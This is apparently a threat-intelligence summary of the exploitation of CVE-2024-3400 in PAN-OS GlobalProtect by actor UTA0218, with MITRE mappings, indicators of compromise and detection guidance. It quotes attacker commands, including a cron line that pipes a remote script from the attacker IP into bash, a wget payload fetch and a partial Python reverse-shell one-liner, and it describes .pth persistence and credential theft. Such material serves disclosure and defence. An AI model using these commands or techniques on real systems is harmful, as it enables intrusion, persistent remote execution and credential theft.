Keypoints
- Volexity detected active exploitation of an unauthenticated RCE in GlobalProtect PAN-OS (CVE-2024-3400) beginning in late March and confirmed compromises in April 2024.
- The threat actor UTA0218 created reverse shells, downloaded tooling, and exported firewall configuration for lateral entry into victim networks.
- UTA0218 attempted to install a Python backdoor named UPSTYLE by placing a malicious .pth file at /usr/lib/python3.6/site-packages/system.pth to force code execution on Python import.
- Persistence was implemented via a cron job (/etc/cron.d/update) that fetched a remote “policy” script every minute; multiple policy variants performed reverse shells, config exfil, tunneling, and SSH-based reverse shells.
- Downloaded tooling included GOST (SOCKS/RTCP tunneling) and an open-source reverse-SSH binary; attacker infrastructure centered on 172.233.228[.]93 and a mix of VPS, compromised routers, and an abused AWS bucket.
- Lateral movement leveraged a privileged service account to pivot via SMB and WinRM to steal NTDS.DIT, DPAPI keys, browser cookies/login data, and Windows event artifacts.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The attacker exploited an unauthenticated remote code execution in GlobalProtect: ‘unauthenticated remote code execution vulnerability’ and assigned CVE-2024-3400.
- [T1059.006] Command and Scripting Interpreter: Python – The actor executed one-liner Python reverse shells and Python backdoors: ‘python -c “import sys,socket,os,pty;…”;’
- [T1105] Ingress Tool Transfer – Tools and payloads were fetched from attacker servers using HTTP/wget: ‘wget http://172.233.228[.]93/vpn.log -O /tmp/vpn.log’ and similar commands.
- [T1053.003] Scheduled Task/Job: Cron – Persistence was achieved by creating a cron file that runs every minute to fetch and execute remote content: ‘* * * * * root wget -qO- http://172.233.228[.]93/policy | bash’.
- [T1574] Hijack Execution Flow – The UPSTYLE backdoor abused Python .pth semantics to execute code on module import by writing ‘/usr/lib/python3.6/site-packages/system.pth’ and relying on ‘lines in .pth files beginning with the text “import” … are executed’.
- [T1021.002] Remote Services: SMB – The attacker pivoted into internal hosts via SMB using a privileged service account: ‘pivot internally across the affected networks via SMB and WinRM’.
- [T1021.006] Remote Services: Windows Remote Management (WinRM) – WinRM was used alongside SMB for lateral access: ‘pivot internally across the affected networks via SMB and WinRM’.
- [T1003] OS Credential Dumping – Attacker targeted Active Directory and DPAPI secrets, exfiltrating ‘NTDS.DIT’ and domain DPAPI backup keys: ‘grab the domain backup DPAPI keys and targeting active directory credentials by obtaining the NTDS.DIT file’.
- [T1090] Proxy – The actor attempted to deploy GOST to create SOCKS/RTCP tunnels and proxy access into victim networks: ‘GOST (GO Simple Tunnel)’ and commands to run it as a background proxy.
Indicators of Compromise
- [IP Address] Attacker C2 and hosting – 172.233.228[.]93 (used to serve policy/vpn.log/vpn_prot), and other VPS/compromised hosts noted.
- [File hashes] Malicious payloads and tooling – update.py SHA256: 3de2a4392b87…9caac, gost-linux-amd64 SHA256: 448fbd7b3389…5b7c, reverse-sshx64 SHA256: 161fd76c83e5…50f8, and several other policy/patch hashes.
- [Filenames] Artifacts used on appliances – update.py, patch, policy, system.pth, /var/appweb/sslvpndocs/global-protect/*.css (used to store command output).
- [URLs / Domains] Remote fetch and anomalous requests – http://172.233.228[.]93/policy (attacker-hosted), and observed HTTP GET to worldtimeapi[.]org/api/timezone/etc/utc originating from the appliance.
- [File paths] Malicious persistence and I/O locations – /usr/lib/python3.6/site-packages/system.pth, /etc/cron.d/update, /var/log/pan/sslvpn_ngx_error.log, and /var/appweb/sslvpndocs/global-protect/bootstrap.min.css.
The exploitation sequence began with unauthenticated RCE against GlobalProtect (CVE-2024-3400) to spawn reverse shells (Python one-liners) and execute commands. After initial access, attackers fetched secondary payloads via HTTP/wget from 172.233.228[.]93 (examples: vpn.log, vpn_prot.gz, lowdp) and executed them to establish tunnels and remote shells (GOST, reverse-sshx64). UPSTYLE, the Python backdoor, was installed by placing a malicious .pth file under /usr/lib/python3.6/site-packages/system.pth; it decodes commands embedded in requests by reading /var/log/pan/sslvpn_ngx_error.log and writes outputs to an existing CSS file (bootstrap.min.css), restoring timestamps to hide activity.
Persistence was additionally implemented by creating /etc/cron.d/update via a ‘patch’ script which runs every minute to wget a remote ‘policy’ script and pipe it to bash. Multiple ‘policy’ variants were used sequentially to (1) launch Python reverse shells, (2) copy firewall running-config.xml into a web-accessible CSS file for exfiltration, (3) deploy and run GOST tunneling (SOCKS/RTCP), and (4) deploy an SSH-based reverse shell listening on port 31289. The attacker also manually managed ACLs on their C2 so only targeted devices could reach the servers.
After foothold, the actor pivoted internally using a privileged service account via SMB and WinRM to collect AD and workstation artifacts: NTDS.DIT, DPAPI backup keys, Windows event logs, and browser artifacts (Login Data, Cookies, Local State) to recover credentials and session tokens. Detection guidance: monitor for outbound wget/http requests from GlobalProtect appliances (notably to 172.233.228[.]93 or unexpected hosts), SMB/WinRM sessions originating from firewalls, HTTP GETs to worldtimeapi[.]org/api/timezone/etc/utc from the appliance, and inspect tech-support archives and /var/log/pan/sslvpn_ngx_error.log for injected command patterns.